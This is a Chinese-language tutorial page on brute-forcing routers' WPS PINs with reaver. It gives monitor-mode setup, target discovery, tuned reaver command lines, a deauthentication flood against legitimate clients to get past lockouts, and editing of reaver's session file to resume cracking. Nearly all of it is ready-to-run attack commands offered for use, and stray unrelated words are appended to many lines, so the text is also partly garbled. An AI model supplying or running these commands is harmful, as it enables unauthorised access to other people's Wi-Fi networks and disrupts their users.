reaver跑pin碼wpc文件的修改
reaver跑路由器pin碼過程:(root權限下) git
1 輸入:airmon-ng start wlan0 開啓監聽模式 session
2 輸入:wash -i mon0 -C 查看全部開啓WPS的無線路由 長時間無反應按Ctrl+C,結束進程,這時記下你要PJ的目標路由MAC. 測試
3 輸入:airodump-ng mon0 網卡以混雜模式掃描全部頻道—並顯示全部AP的信息(包括 AP的信號強度,ESSID,MAC,頻道,加密方式,等等…..),按Ctrl+C,結束掃描. ui
4 輸入:reaver -i mon0 -b MAC -a -S -vv 開始窮舉pin碼 加密
reaver 參數詳解: 接口
-i, –interface=<wlan> Name of the monitor-mode interface to use
網卡的監視接口,一般是mon0(必需)
-b, –bssid=<mac> BSSID of the target AP
AP的MAC地址(必需) 進程
-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)
信號的頻道,若是不指定會自動掃描,如-c1 指定1頻道(經常使用) ci
-a, –auto Auto detect the best advanced options for the target AP
對目標AP自動檢測高級參數,自動檢測目標AP最佳配置(經常使用) 路由
-v, –verbose Display non-critical warnings (-vv for more)
顯示不重要警告信息 -vv 能夠顯示更多(經常使用) get
-S 使用最小的DH key,能夠提升PJ速度(經常使用)
-t 即timeout每次窮舉等待反饋的最長時間(經常使用)
-s, –session=<file> Restore a previous session file
恢復進度文件
-N, –no-nacks Do not send NACK messages when out of order packets are received
不發送NACK信息
-n, –nack Target AP always sends a NACK [Auto]
對目標AP老是發送NACK,默認自動
-f, –fixed Disable channel hopping
禁止頻道跳轉
-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin
使用指定的4位或者8位pin碼,能夠用8位直接找到密碼(經常使用)
-d, –delay=<seconds> Set the delay between pin attempts [1]
pin間延時,默認1秒(經常使用)
-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
AP鎖定WPS後等待時間
-g, –max-attempts=<num> Quit after num pin attempts
最大pin次數
-q, –quiet Only display critical messages
只顯示關鍵信息
-h, –help Show help
顯示幫助
因情況調整參數(-c後面都已目標頻道爲1做爲例子)
目標信號很是好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目標信號普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t .5 -c 1
目標信號通常: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
常見問題的處理:
1.若是出現超長的WPA PSK可使用第四條命令「reaver –i mon0 –b MAC –p WPA PSK」
MAC爲目標的mac地址,WPA PSK爲獲取到的超長密碼。做用是將指定的pin碼獲取
wpa密碼psk。
2.reaver -i mon0 -b MAC -p PIN8位數
直接由pin碼獲得psk密碼
3.90.9%進程後出現問題或卡死,請記下PIN前四位數,從新跑後三位數,若是前四位正確的話
reaver -i mon0 -b MAC -p PIN前4位數
4.PIN僵死鎖定後的方法。也能夠攻擊隱藏ssid的路由 aireplay-ng-0 1000 -a SSID 的MAC -c 合法客戶端的MAC 網卡端口
就是讓客戶端斷開鏈接1000次macchanger
pin碼的進度文件保存在/usr/local/etc/下,XXXXXXXXXXXX.wpc (MAC地址爲文件名)
MAC.wpc結構
0 //第一行,這個地方是說它的前4位PIN碼的進度位置數
0 //第二行,這個地方是說後3位PIN數的已經運行測試位置數
0 //第三行,0時沒有找到,當爲1時找到前四位,當爲2時所有找到.
1234
0123
1111
2222
3333
.......
.......
如咱們要從2000開始pin,你能夠將第一行修改成2004,這樣它就會從2000開始PIN了.
命令是這樣的 reaver -i mon0 -b xx:xx:xx:xx:xx -a -S -vv -s /usr/local/etc/XXXXXXXXXXXX.wpc , 小寫的-s後面跟進度文件的路徑.
- 1. Raspberry Pi下跑aircrack和reaver破解路由器PIN碼
- 2. Linux修改文件編碼
- 3. Linux - 修改文件編碼
- 4. IDEA文件編碼修改
- 5. 修改eclipse文件的編碼格式
- 6. eclipse修改properties文件的編碼
- 7. 修改pin碼輸入錯誤超時時間
- 8. 修改文件的屬性
- 9. MAChost文件的修改
- 10. 文件權限的修改
- 更多相關文章...
- • MySQL修改視圖(ALTER VIEW) - MySQL教程
- • MySQL修改用戶(RENAME USER) - MySQL教程
- • Docker容器實戰(七) - 容器眼光下的文件系統
- • Scala 中文亂碼解決
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. Window下Ribbit MQ安裝
- 2. Linux下Redis安裝及集羣搭建
- 3. shiny搭建網站填坑戰略
- 4. Mysql8.0.22安裝與配置詳細教程
- 5. Hadoop安裝及配置
- 6. Python爬蟲初學筆記
- 7. 部署LVS-Keepalived高可用集羣
- 8. keepalived+mysql高可用集羣
- 9. jenkins 公鑰配置
- 10. HA實用詳解
- 1. Raspberry Pi下跑aircrack和reaver破解路由器PIN碼
- 2. Linux修改文件編碼
- 3. Linux - 修改文件編碼
- 4. IDEA文件編碼修改
- 5. 修改eclipse文件的編碼格式
- 6. eclipse修改properties文件的編碼
- 7. 修改pin碼輸入錯誤超時時間
- 8. 修改文件的屬性
- 9. MAChost文件的修改
- 10. 文件權限的修改